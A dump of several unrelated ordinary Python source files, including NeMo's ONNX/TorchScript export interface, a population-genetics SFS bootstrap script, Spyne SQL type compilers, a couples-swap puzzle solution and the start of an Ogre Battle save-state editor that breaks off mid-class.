            if forward_method:
                type(self).forward = old_forward_method
            self._export_teardown()
        return ([output], [output_descr])

    @property
    def disabled_deployment_input_names(self):
        """Implement this method to return a set of input names disabled for export"""
        return set()

    @property
    def disabled_deployment_output_names(self):
        """Implement this method to return a set of output names disabled for export"""
        return set()

    @property
    def supported_export_formats(self):
        """Implement this method to return a set of export formats supported. Default is all types."""
        return set([ExportFormat.ONNX, ExportFormat.TORCHSCRIPT])

    def _prepare_for_export(self, **kwargs):
        """
        Override this method to prepare module for export. This is in-place operation.
        Base version does common necessary module replacements (Apex etc)
        """
        if 'noreplace' not in kwargs:
            replace_for_export(self)

    def _export_teardown(self):
        """
        Override this method for any teardown code after export.
        """
        pass

    @property
    def input_names(self):
        return get_io_names(self.input_module.input_types, self.disabled_deployment_input_names)

    @property
    def output_names(self):
        return get_io_names(self.output_module.output_types, self.disabled_deployment_output_names)
|
<filename>nemo/core/classes/exportable.py
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC
import onnx
import torch
from torch.onnx import ExportTypes, TrainingMode
from nemo.core.classes import typecheck
from nemo.core.utils.neural_type_utils import get_dynamic_axes, get_io_names
from nemo.utils import logging
from nemo.utils.export_utils import (
ExportFormat,
augment_filename,
get_export_format,
parse_input_example,
replace_for_export,
verify_runtime,
wrap_forward_method,
)
__all__ = ['ExportFormat', 'Exportable']
class Exportable(ABC):
"""
This Interface should be implemented by particular classes derived from nemo.core.NeuralModule or nemo.core.ModelPT.
It gives these entities ability to be exported for deployment to formats such as ONNX.
"""
@property
def input_module(self):
return self
@property
def output_module(self):
return self
def export(
self,
output: str,
input_example=None,
verbose=False,
export_params=True,
do_constant_folding=True,
onnx_opset_version=None,
try_script: bool = False,
training=TrainingMode.EVAL,
check_trace: bool = False,
use_dynamic_axes: bool = True,
dynamic_axes=None,
check_tolerance=0.01,
):
my_args = locals().copy()
my_args.pop('self')
exportables = []
for m in self.modules():
if isinstance(m, Exportable):
exportables.append(m)
qual_name = self.__module__ + '.' + self.__class__.__qualname__
format = get_export_format(output)
output_descr = f"{qual_name} exported to {format}"
# Pytorch's default for None is too low, can't pass None through
if onnx_opset_version is None:
onnx_opset_version = 13
try:
# Disable typechecks
typecheck.set_typecheck_enabled(enabled=False)
# Allow user to completely override forward method to export
forward_method, old_forward_method = wrap_forward_method(self)
# Set module mode
with torch.onnx.select_model_mode_for_export(
self, training
), torch.inference_mode(), torch.jit.optimized_execution(True):
if input_example is None:
input_example = self.input_module.input_example()
# Remove i/o examples from args we propagate to enclosed Exportables
my_args.pop('output')
my_args.pop('input_example')
# Run (posibly overridden) prepare methods before calling forward()
for ex in exportables:
ex._prepare_for_export(**my_args, noreplace=True)
self._prepare_for_export(output=output, input_example=input_example, **my_args)
input_list, input_dict = parse_input_example(input_example)
input_names = self.input_names
output_names = self.output_names
output_example = tuple(self.forward(*input_list, **input_dict))
jitted_model = None
if try_script:
try:
jitted_model = torch.jit.script(self)
except Exception as e:
logging.error(f"jit.script() failed!\{e}")
if format == ExportFormat.TORCHSCRIPT:
if jitted_model is None:
jitted_model = torch.jit.trace_module(
self,
{"forward": tuple(input_list) + tuple(input_dict.values())},
strict=True,
check_trace=check_trace,
check_tolerance=check_tolerance,
)
if not self.training:
jitted_model = torch.jit.optimize_for_inference(jitted_model)
if verbose:
logging.info(f"JIT code:\n{jitted_model.code}")
jitted_model.save(output)
assert os.path.exists(output)
elif format == ExportFormat.ONNX:
if jitted_model is None:
jitted_model = self
# dynamic axis is a mapping from input/output_name => list of "dynamic" indices
if dynamic_axes is None and use_dynamic_axes:
dynamic_axes = get_dynamic_axes(self.input_module.input_types, input_names)
dynamic_axes.update(get_dynamic_axes(self.output_module.output_types, output_names))
torch.onnx.export(
jitted_model,
input_example,
output,
input_names=input_names,
output_names=output_names,
verbose=verbose,
export_params=export_params,
do_constant_folding=do_constant_folding,
dynamic_axes=dynamic_axes,
opset_version=onnx_opset_version,
)
if check_trace:
verify_runtime(output, input_list, input_dict, input_names, output_names, output_example)
else:
raise ValueError(f'Encountered unknown export format {format}.')
finally:
typecheck.set_typecheck_enabled(enabled=True)
if forward_method:
type(self).forward = old_forward_method
self._export_teardown()
return ([output], [output_descr])
@property
def disabled_deployment_input_names(self):
"""Implement this method to return a set of input names disabled for export"""
return set()
@property
def disabled_deployment_output_names(self):
"""Implement this method to return a set of output names disabled for export"""
return set()
@property
def supported_export_formats(self):
"""Implement this method to return a set of export formats supported. Default is all types."""
return set([ExportFormat.ONNX, ExportFormat.TORCHSCRIPT])
def _prepare_for_export(self, **kwargs):
"""
Override this method to prepare module for export. This is in-place operation.
Base version does common necessary module replacements (Apex etc)
"""
if not 'noreplace' in kwargs:
replace_for_export(self)
def _export_teardown(self):
"""
Override this method for any teardown code after export.
"""
pass
@property
def input_names(self):
return get_io_names(self.input_module.input_types, self.disabled_deployment_input_names)
@property
def output_names(self):
return get_io_names(self.output_module.output_types, self.disabled_deployment_output_names)
|
en
| 0.844568
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. This Interface should be implemented by particular classes derived from nemo.core.NeuralModule or nemo.core.ModelPT. It gives these entities ability to be exported for deployment to formats such as ONNX. # Pytorch's default for None is too low, can't pass None through # Disable typechecks # Allow user to completely override forward method to export # Set module mode # Remove i/o examples from args we propagate to enclosed Exportables # Run (posibly overridden) prepare methods before calling forward() # dynamic axis is a mapping from input/output_name => list of "dynamic" indices Implement this method to return a set of input names disabled for export Implement this method to return a set of output names disabled for export Implement this method to return a set of export formats supported. Default is all types. Override this method to prepare module for export. This is in-place operation. Base version does common necessary module replacements (Apex etc) Override this method for any teardown code after export.
| 2.262301
| 2
|
3- Strings/string-methods.py
|
WildGenie/Python-for-ML-
| 7
|
6628514
|
# Demonstration of common Python string methods.
msg = "Python Kursumuza Ho<NAME>iniz. <NAME> TEKE"
# Earlier experiments, kept for reference:
# sonuc = msg.upper()
# sonuc = msg.lower()
# sonuc = msg.title()
# sonuc = msg.capitalize()
# sonuc = "abc".islower()
# sonuc = " abc ".strip()
# sonuc = msg.split()
# sonuc = msg.split('.')
# sonuc = "-".join(sonuc)
# index = msg.index('Hoş')
# sonuc = msg.startswith('A')
# sonuc = msg.endswith('n')
sonuc = msg.replace('TEKE', 'Orkun')  # immediately overwritten below
# Build a slug: lowercase, spaces to dashes, drop dots, ASCII-fold Turkish letters.
sonuc = (msg.lower()
         .replace(' ', '-')
         .replace('ş', 's')
         .replace('.', '')
         .replace('ı', 'i'))
print(sonuc)
|
# Demonstration of common Python string methods.
msg = "Python Kursumuza Ho<NAME>iniz. <NAME> TEKE"
# Earlier experiments, kept for reference:
# sonuc = msg.upper()
# sonuc = msg.lower()
# sonuc = msg.title()
# sonuc = msg.capitalize()
# sonuc = "abc".islower()
# sonuc = " abc ".strip()
# sonuc = msg.split()
# sonuc = msg.split('.')
# sonuc = "-".join(sonuc)
# index = msg.index('Hoş')
# sonuc = msg.startswith('A')
# sonuc = msg.endswith('n')
sonuc = msg.replace('TEKE', 'Orkun')  # immediately overwritten below
# Build a slug: lowercase, spaces to dashes, drop dots, ASCII-fold Turkish letters.
sonuc = (msg.lower()
         .replace(' ', '-')
         .replace('ş', 's')
         .replace('.', '')
         .replace('ı', 'i'))
print(sonuc)
|
tr
| 0.241998
|
# sonuc = msg.upper() # sonuc = msg.lower() # sonuc = msg.title() # sonuc = msg.capitalize() # sonuc = "abc".islower() # sonuc = " abc ".strip() # sonuc = msg.split() # sonuc = msg.split('.') # sonuc = "-".join(sonuc) # index = msg.index('Hoş') # sonuc = msg.startswith('A') # sonuc = msg.endswith('n')
| 3.271677
| 3
|
scripts/run_generate_sfs_segments.py
|
quanc1989/SV-ONT-Tibetan
| 7
|
6628515
|
<gh_stars>1-10
import json
import math
import os
import random
import configargparse
import dadi
def config_opts():
    """Build the command-line/YAML argument parser for this script."""
    parser = configargparse.ArgumentParser(
        description='run_convert_vcf_to_dadi.py',
        config_file_parser_class=configargparse.YAMLConfigFileParser,
        formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
    # (flags, kwargs) pairs for every supported option, registered in order.
    options = [
        (('-d', '--data'), dict(required=True, help='datadict file')),
        (('-p', '--prefix'), dict(required=True, help='save prefix')),
        (('-l', '--poplist'), dict(required=True, help='population string')),
        (('--projections',), dict(required=True,
                                  help='projections down, same size to poplist')),
        (('-w', '--window'), dict(type=int, required=False, help='window width')),
        (('-u', '--unfold'), dict(required=False, action='store_true',
                                  default=False, help='whether it is unfold')),
        (('-r', '--random'), dict(required=False, action='store_true',
                                  default=False,
                                  help='generate random bootstrap sets')),
    ]
    for flags, kwargs in options:
        parser.add(*flags, **kwargs)
    return parser
if __name__ == '__main__':
    parser = config_opts()
    opt = parser.parse_args()
    # chrom -> {variant-key or window-index -> dadi data-dict entry}
    datadict = {}
    # chrom -> number of variants seen (sizes the bootstrap chunks below)
    total_variants_chrom = {}
    with open(opt.data, 'r') as file_read:
        lines = file_read.read().strip().split('\n')
        # limit_variants = 10000
        # index_variant = 0
        for line in lines:
            # print(line)
            # Each line is "<chrom>-<pos>...{python-repr dict}"; split at the
            # first '{' into key part and payload part.
            key_line = line.split('{')[0]
            val_line = line[line.index('{'):]
            # print(key_line,'--',val_line)
            info = key_line.split('-')
            chrom = info[0]
            pos = int(info[1])
            if chrom not in datadict:
                datadict[chrom] = {}
                total_variants_chrom[chrom] = 0
            if opt.window:
                # Fixed-width genomic windows: bucket variants by pos // window.
                order_pos = int(pos / opt.window)
                if order_pos not in datadict[chrom]:
                    datadict[chrom][order_pos] = {}
                # Payload is a python repr; rewrite quotes/parens into JSON.
                datadict[chrom][order_pos][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
            else:
                datadict[chrom][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
            total_variants_chrom[chrom] += 1
    if not os.path.exists(opt.prefix):
        os.makedirs(opt.prefix)
    # list_pops = ['TIB', 'HANN', 'HANS']
    list_pops = [x.strip() for x in opt.poplist.split(',')]
    list_pojections = [int(x.strip()) for x in opt.projections.split(',')]
    if not opt.window: datadict_bootstrap={}
    with open(os.path.join(opt.prefix, 'generate_sfs_segments.log'), 'w') as file_write:
        for chrom in datadict:
            if opt.window:
                print('Simulation #%s start' % chrom)
                # One site-frequency spectrum per genomic window, saved under
                # <prefix>/<chrom>/<chrom>-<window>.fs
                for order_pos in datadict[chrom]:
                    fs = dadi.Spectrum.from_data_dict(data_dict=datadict[chrom][order_pos],
                                                      pop_ids=list_pops,
                                                      projections=list_pojections,
                                                      polarized=opt.unfold)
                    if not os.path.exists(os.path.join(opt.prefix, chrom)):
                        os.makedirs(os.path.join(opt.prefix, chrom))
                    fs.to_file(os.path.join(opt.prefix, chrom, chrom + '-' + str(order_pos) + '.fs'))
                    file_write.writelines('%s\t%d\t%d\n' %(chrom, order_pos, len(datadict[chrom][order_pos])))
            else:
                # Split this chromosome's variants into ~100 equal chunks
                # (optionally shuffled) that become bootstrap resampling units.
                window = total_variants_chrom[chrom]/100
                # NOTE(review): floor(index/window) reaches 100 for the last
                # variant, producing a 101st (small) chunk -- confirm intended.
                list_keys = list(datadict[chrom].keys())
                if opt.random:
                    random.shuffle(list_keys)
                index_variant = 0
                for key_variant in list_keys:
                    # pos = int(key_line.split('-')[1])
                    index_variant += 1
                    order_pos = math.floor(index_variant / window)
                    if order_pos not in datadict_bootstrap:
                        datadict_bootstrap[order_pos] = {}
                    # print(key_variant,'--',datadict[chrom][key_variant],'--',str(order_pos))
                    datadict_bootstrap[order_pos][key_variant] = datadict[chrom][key_variant]
        if not opt.window:
            # 100 bootstrap replicates: draw 100 chunks with replacement,
            # de-duplicate repeated keys by suffixing the copy index, then
            # build and save one SFS per replicate.
            index_bootstrap = 0
            list_keys = list(datadict_bootstrap.keys())
            while index_bootstrap < 100:
                index_bootstrap += 1
                print('Bootstrap #%d start' % index_bootstrap)
                list_keys_bootstrap = random.choices(list_keys, k=100)
                set_keys_bootstrap = set(list_keys_bootstrap)
                dict_to_spectrum = {}
                for order_pos in set_keys_bootstrap:
                    group_order_pos = list_keys_bootstrap.count(order_pos)
                    for index_group in range(group_order_pos):
                        for key_variant in datadict_bootstrap[order_pos]:
                            dict_to_spectrum[key_variant + '-' + str(index_group)] = datadict_bootstrap[order_pos][key_variant]
                with open(os.path.join(opt.prefix, "datadict."+str(index_bootstrap)+".txt"), 'w') as outfile:
                    for x, y in dict_to_spectrum.items():
                        outfile.write(x + str(y) + "\n")
                fs = dadi.Spectrum.from_data_dict(data_dict=dict_to_spectrum,
                                                  pop_ids=list_pops,
                                                  projections=list_pojections,
                                                  polarized=opt.unfold)
                fs.to_file(os.path.join(opt.prefix, str(index_bootstrap) + '.fs'))
                file_write.writelines('%d\t%d\n' %(index_bootstrap, len(dict_to_spectrum)))
                print(str(len(dict_to_spectrum)))
|
import json
import math
import os
import random
import configargparse
import dadi
# NOTE(review): duplicate copy of run_generate_sfs_segments.py; keep in sync
# with the first copy in this file or de-duplicate.
def config_opts():
    """Build the command-line/YAML argument parser for this script."""
    parser = configargparse.ArgumentParser(
        description='run_convert_vcf_to_dadi.py',
        config_file_parser_class=configargparse.YAMLConfigFileParser,
        formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
    parser.add('-d', '--data', required=True,
               help='datadict file')
    parser.add('-p', '--prefix', required=True,
               help='save prefix')
    parser.add('-l', '--poplist', required=True,
               help='population string')
    parser.add('--projections', required=True,
               help='projections down, same size to poplist')
    parser.add('-w', '--window', type=int, required=False,
               help='window width')
    parser.add('-u', '--unfold', required=False, action='store_true', default= False,
               help='whether it is unfold')
    parser.add('-r', '--random', required=False, action='store_true', default= False,
               help='generate random bootstrap sets')
    return parser
if __name__ == '__main__':
    parser = config_opts()
    opt = parser.parse_args()
    # chrom -> {variant-key or window-index -> dadi data-dict entry}
    datadict = {}
    total_variants_chrom = {}
    with open(opt.data, 'r') as file_read:
        lines = file_read.read().strip().split('\n')
        # limit_variants = 10000
        # index_variant = 0
        for line in lines:
            # print(line)
            # Each line is "<chrom>-<pos>...{python-repr dict}".
            key_line = line.split('{')[0]
            val_line = line[line.index('{'):]
            # print(key_line,'--',val_line)
            info = key_line.split('-')
            chrom = info[0]
            pos = int(info[1])
            if chrom not in datadict:
                datadict[chrom] = {}
                total_variants_chrom[chrom] = 0
            if opt.window:
                order_pos = int(pos / opt.window)
                if order_pos not in datadict[chrom]:
                    datadict[chrom][order_pos] = {}
                datadict[chrom][order_pos][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
            else:
                datadict[chrom][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
            total_variants_chrom[chrom] += 1
    if not os.path.exists(opt.prefix):
        os.makedirs(opt.prefix)
    # list_pops = ['TIB', 'HANN', 'HANS']
    list_pops = [x.strip() for x in opt.poplist.split(',')]
    list_pojections = [int(x.strip()) for x in opt.projections.split(',')]
    if not opt.window: datadict_bootstrap={}
    with open(os.path.join(opt.prefix, 'generate_sfs_segments.log'), 'w') as file_write:
        for chrom in datadict:
            if opt.window:
                print('Simulation #%s start' % chrom)
                # One SFS per genomic window.
                for order_pos in datadict[chrom]:
                    fs = dadi.Spectrum.from_data_dict(data_dict=datadict[chrom][order_pos],
                                                      pop_ids=list_pops,
                                                      projections=list_pojections,
                                                      polarized=opt.unfold)
                    if not os.path.exists(os.path.join(opt.prefix, chrom)):
                        os.makedirs(os.path.join(opt.prefix, chrom))
                    fs.to_file(os.path.join(opt.prefix, chrom, chrom + '-' + str(order_pos) + '.fs'))
                    file_write.writelines('%s\t%d\t%d\n' %(chrom, order_pos, len(datadict[chrom][order_pos])))
            else:
                # Split variants into ~100 chunks used as bootstrap units.
                window = total_variants_chrom[chrom]/100
                list_keys = list(datadict[chrom].keys())
                if opt.random:
                    random.shuffle(list_keys)
                index_variant = 0
                for key_variant in list_keys:
                    # pos = int(key_line.split('-')[1])
                    index_variant += 1
                    order_pos = math.floor(index_variant / window)
                    if order_pos not in datadict_bootstrap:
                        datadict_bootstrap[order_pos] = {}
                    # print(key_variant,'--',datadict[chrom][key_variant],'--',str(order_pos))
                    datadict_bootstrap[order_pos][key_variant] = datadict[chrom][key_variant]
        if not opt.window:
            # 100 bootstrap replicates over the chunks, sampled with replacement.
            index_bootstrap = 0
            list_keys = list(datadict_bootstrap.keys())
            while index_bootstrap < 100:
                index_bootstrap += 1
                print('Bootstrap #%d start' % index_bootstrap)
                list_keys_bootstrap = random.choices(list_keys, k=100)
                set_keys_bootstrap = set(list_keys_bootstrap)
                dict_to_spectrum = {}
                for order_pos in set_keys_bootstrap:
                    group_order_pos = list_keys_bootstrap.count(order_pos)
                    for index_group in range(group_order_pos):
                        for key_variant in datadict_bootstrap[order_pos]:
                            dict_to_spectrum[key_variant + '-' + str(index_group)] = datadict_bootstrap[order_pos][key_variant]
                with open(os.path.join(opt.prefix, "datadict."+str(index_bootstrap)+".txt"), 'w') as outfile:
                    for x, y in dict_to_spectrum.items():
                        outfile.write(x + str(y) + "\n")
                fs = dadi.Spectrum.from_data_dict(data_dict=dict_to_spectrum,
                                                  pop_ids=list_pops,
                                                  projections=list_pojections,
                                                  polarized=opt.unfold)
                fs.to_file(os.path.join(opt.prefix, str(index_bootstrap) + '.fs'))
                file_write.writelines('%d\t%d\n' %(index_bootstrap, len(dict_to_spectrum)))
                print(str(len(dict_to_spectrum)))
|
en
| 0.086227
|
# limit_variants = 10000 # index_variant = 0 # print(line) # print(key_line,'--',val_line) # list_pops = ['TIB', 'HANN', 'HANS'] #%s start' % chrom) # pos = int(key_line.split('-')[1]) # print(key_variant,'--',datadict[chrom][key_variant],'--',str(order_pos)) #%d start' % index_bootstrap)
| 2.527751
| 3
|
spyne/store/relational/override.py
|
edustaff/spyne
| 786
|
6628516
|
#
# spyne - Copyright (C) Spyne contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.dialects.postgresql import INET
from spyne.store.relational import PGXml, PGJson, PGHtml, PGJsonB, \
PGObjectJson, PGFileJson
# SQL column-type renderings for Spyne's custom SQLAlchemy types.
@compiles(PGXml)
def compile_xml(type_, compiler, **kw):
    # Native PostgreSQL xml column.
    return "xml"
@compiles(PGHtml)
def compile_html(type_, compiler, **kw):
    # HTML has no native PG type; stored as plain text.
    return "text"
@compiles(PGJson)
def compile_json(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(PGJsonB)
def compile_jsonb(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(PGObjectJson)
def compile_ojson(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(PGFileJson)
def compile_fjson(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(INET)
def compile_inet(type_, compiler, **kw):
    return "inet"
# Firebird fallbacks: no native xml/json/inet types, so store as blob/varchar.
@compiles(PGXml, "firebird")
def compile_xml_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGHtml, "firebird")
def compile_html_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGJson, "firebird")
def compile_json_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGJsonB, "firebird")
def compile_jsonb_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGObjectJson, "firebird")
def compile_ojson_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGFileJson, "firebird")
def compile_fjson_firebird(type_, compiler, **kw):
    return "blob"
@compiles(INET, "firebird")
def compile_inet_firebird(type_, compiler, **kw):
    # http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html
    # INET6_ADDRSTRLEN
    return "varchar(45)"
|
#
# spyne - Copyright (C) Spyne contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.dialects.postgresql import INET
from spyne.store.relational import PGXml, PGJson, PGHtml, PGJsonB, \
PGObjectJson, PGFileJson
# SQL column-type renderings for Spyne's custom SQLAlchemy types.
@compiles(PGXml)
def compile_xml(type_, compiler, **kw):
    # Native PostgreSQL xml column.
    return "xml"
@compiles(PGHtml)
def compile_html(type_, compiler, **kw):
    # HTML has no native PG type; stored as plain text.
    return "text"
@compiles(PGJson)
def compile_json(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(PGJsonB)
def compile_jsonb(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(PGObjectJson)
def compile_ojson(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(PGFileJson)
def compile_fjson(type_, compiler, **kw):
    return type_.get_col_spec()
@compiles(INET)
def compile_inet(type_, compiler, **kw):
    return "inet"
# Firebird fallbacks: no native xml/json/inet types, so store as blob/varchar.
@compiles(PGXml, "firebird")
def compile_xml_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGHtml, "firebird")
def compile_html_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGJson, "firebird")
def compile_json_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGJsonB, "firebird")
def compile_jsonb_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGObjectJson, "firebird")
def compile_ojson_firebird(type_, compiler, **kw):
    return "blob"
@compiles(PGFileJson, "firebird")
def compile_fjson_firebird(type_, compiler, **kw):
    return "blob"
@compiles(INET, "firebird")
def compile_inet_firebird(type_, compiler, **kw):
    # http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html
    # INET6_ADDRSTRLEN
    return "varchar(45)"
|
en
| 0.837478
|
# # spyne - Copyright (C) Spyne contributors. # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 # # http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/netinet_in.h.html # INET6_ADDRSTRLEN
| 1.641485
| 2
|
solutions/problem_240.py
|
bssrdf/daily-coding-problem
| 0
|
6628517
|
#I think, at the most, `n-1` moves should be sufficient.
class Solution(object):
    def minSwapsCouples(self, row):
        """
        Minimum swaps so every couple (2k, 2k+1) sits in adjacent seats.

        :type row: List[int]  (permutation of 0..2n-1)
        :rtype: int

        Union-find over *couple ids*: each seat pair (2i, 2i+1) links the
        couples of the two people sitting there. Every successful merge saves
        one swap, so the answer is n - number_of_components.
        """
        n = len(row)//2
        self.count = n
        roots = [i for i in range(n)]
        def find(i):
            # Path-halving find.
            while roots[i] != i:
                roots[i] = roots[roots[i]]
                i = roots[i]
            return i
        def union(i, j):
            x, y = find(i), find(j)
            if x != y:
                roots[x] = y
                self.count -= 1
        for i in range(n):
            a = row[2*i]
            b = row[2*i + 1]
            # BUG FIX: union couple ids (person // 2), not raw person ids --
            # raw ids reach 2n-1 and would index past `roots` (size n).
            union(a // 2, b // 2)
        return n - self.count
if __name__=="__main__":
    # NOTE(review): [0, 1, 0, 1] is not a valid permutation of 0..2n-1;
    # consider a legal demo input such as [0, 2, 1, 3].
    print(Solution().minSwapsCouples([0, 1, 0, 1]))
|
#I think, at the most, `n-1` moves should be sufficient.
class Solution(object):
    def minSwapsCouples(self, row):
        """
        Minimum swaps so every couple (2k, 2k+1) sits in adjacent seats.

        :type row: List[int]  (permutation of 0..2n-1)
        :rtype: int

        Union-find over *couple ids*: each seat pair (2i, 2i+1) links the
        couples of the two people sitting there. Every successful merge saves
        one swap, so the answer is n - number_of_components.
        """
        n = len(row)//2
        self.count = n
        roots = [i for i in range(n)]
        def find(i):
            # Path-halving find.
            while roots[i] != i:
                roots[i] = roots[roots[i]]
                i = roots[i]
            return i
        def union(i, j):
            x, y = find(i), find(j)
            if x != y:
                roots[x] = y
                self.count -= 1
        for i in range(n):
            a = row[2*i]
            b = row[2*i + 1]
            # BUG FIX: union couple ids (person // 2), not raw person ids --
            # raw ids reach 2n-1 and would index past `roots` (size n).
            union(a // 2, b // 2)
        return n - self.count
if __name__=="__main__":
    # NOTE(review): [0, 1, 0, 1] is not a valid permutation of 0..2n-1;
    # consider a legal demo input such as [0, 2, 1, 3].
    print(Solution().minSwapsCouples([0, 1, 0, 1]))
|
en
| 0.699259
|
#I think, at the most, `n-1` moves should be sufficient. :type row: List[int] :rtype: int
| 3.231798
| 3
|
src/savestate.py
|
lohathe/ogrebattleHacking
| 0
|
6628518
|
<reponame>lohathe/ogrebattleHacking
import collections
import json
def extractJson(file_name):
    """Read *file_name* and return the parsed JSON document."""
    with open(file_name, "r") as handle:
        return json.load(handle)
# Static lookup tables bundled with the tool (paths relative to the CWD).
ITEMS = extractJson("data/items.json")
CLASSES = extractJson("data/classes.json")
NAMES = extractJson("data/names.json")
def findInsideList(list_, key, value, default=None):
    """Return the first mapping in *list_* whose *key* entry equals *value*.

    Falls back to *default* when no element matches.
    """
    return next((item for item in list_ if item[key] == value), default)
def bytes_to_int(data):
    # type: (bytes) -> int
    """Decode *data* as a little-endian unsigned integer (0 for empty input)."""
    assert(isinstance(data, (bytes, bytearray, )))
    return int.from_bytes(data, "little")
def int_to_bytes(data):
    # type: (int) -> bytes
    """Little-endian list of byte values for a non-negative int.

    Always yields at least one byte (0 -> [0]); raises RuntimeError for
    negative input.
    """
    if data < 0:
        raise RuntimeError("Cannot convert negative number to bytes!")
    out = [data & 0xFF]
    data >>= 8
    while data:
        out.append(data & 0xFF)
        data >>= 8
    return out
def bytes_to_num(data):
    # type: (bytes) -> str
    """Decimal-string form of the little-endian integer stored in *data*."""
    assert(isinstance(data, (bytes, bytearray, )))
    value = bytes_to_int(data)
    return str(value)
def num_to_bytes(data):
    # type: (str)-> bytes
    """Inverse of bytes_to_num: parse the decimal string, serialize the int."""
    value = int(data)
    return int_to_bytes(value)
def bytes_to_str(data):
    # type: (bytes) -> str
    """ASCII-decode *data* after stripping trailing NUL padding bytes."""
    assert(isinstance(data, (bytes, bytearray, )))
    return bytes(data).rstrip(b"\x00").decode("ascii")
def str_to_bytes(data):
    # type: (str) -> bytes
    """ASCII-encode *data*; raises UnicodeEncodeError on non-ASCII input.

    Returns `bytes` while the serializers above return lists of ints; both
    support the indexing/iteration callers rely on.
    """
    return data.encode("ascii")
# Table-driven converters between raw save-state bytes and display names.
# Each pair looks up the ITEMS/CLASSES/NAMES tables loaded at module import.
def bytes_to_class(data):
    # type: (bytes) -> str
    # Raw class id -> class display name ("unknown" when unmapped).
    assert(isinstance(data, (bytes, bytearray, )))
    res = findInsideList(CLASSES, "value", bytes_to_int(data), {"name": "unknown"})
    return res["name"]
def class_to_bytes(data):
    # type: (str) -> bytes
    # Class display name -> raw id (0 when unmapped).
    res = findInsideList(CLASSES, "name", data, {"value": 0})
    return int_to_bytes(res["value"])
def bytes_to_name(data):
    # type: (bytes) -> str
    assert(isinstance(data, (bytes, bytearray, )))
    res = findInsideList(NAMES, "value", bytes_to_int(data), {"name": "unknown"})
    return res["name"]
def name_to_bytes(data):
    # type: (str) -> bytes
    res = findInsideList(NAMES, "name", data, {"value": 0})
    return int_to_bytes(res["value"])
def bytes_to_item(data):
    # type: (bytes) -> str
    assert(isinstance(data, (bytes, bytearray, )))
    # Item id 0 means "no item carried".
    if bytes_to_int(data) == 0:
        return "none"
    res = findInsideList(ITEMS, "value", bytes_to_int(data), {"name": "unknown", "descr": ""})
    return res["name"]
def item_to_bytes(data):
    # type: (str) -> bytes
    if data == "none":
        return [0x00]
    res = findInsideList(ITEMS, "name", data, {"value": 0})
    return int_to_bytes(res["value"])
# Uniform record returned by read accessors: decoded value plus provenance
# (raw bytes and the absolute file address they came from).
ReadData = collections.namedtuple("ReadData",
        ("name", "value", "formatted", "raw", "address"))
class OgreBattleSaveState(object):
    """
